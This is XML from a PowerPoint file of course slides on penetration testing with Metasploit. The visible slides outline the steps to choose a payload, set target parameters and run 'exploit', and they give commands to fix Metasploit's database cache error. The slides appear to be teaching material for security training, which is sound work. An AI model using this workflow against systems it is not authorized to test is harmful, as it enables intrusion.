            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>show payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>)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 b="1" dirty="0"/>
              <a:t>Set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>you want to use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 dirty="0"/>
              <a:t>Show parameters needed for the attack to go through (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>)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 b="1" dirty="0"/>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the missing parameters (remote IP, ….)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 dirty="0"/>
              <a:t>Execute “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”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21224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AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> “Database not connected or cache not built”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000CC"/>
              </a:solidFill>
              <a:latin typeface="AlBattar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Issue: The search command in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> is too slow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good solution tutorial:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://miteshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-built/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Step 1: Start up PostgreSQL database services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#service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> start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Step 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> PostgreSQL Database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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>msfdb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init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Step 3: Rebuild database cache in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>msfconsole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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db_rebuild_cache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821963"/>
            <a:ext cx="7181360" cy="7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0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7061</TotalTime>
  <Words>2246</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>358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AlBattar</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>FreeSans</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Solstice</vt:lpstr>
      <vt:lpstr>Penetration Testing       Exploiting 2: Compromising Target by Metasploit tool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Cliff Zou</cp:lastModifiedBy>
  <cp:revision>256</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-21T01:52:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-10T15:52:59Z</dcterms:modified>
</cp:coreProperties>
</file>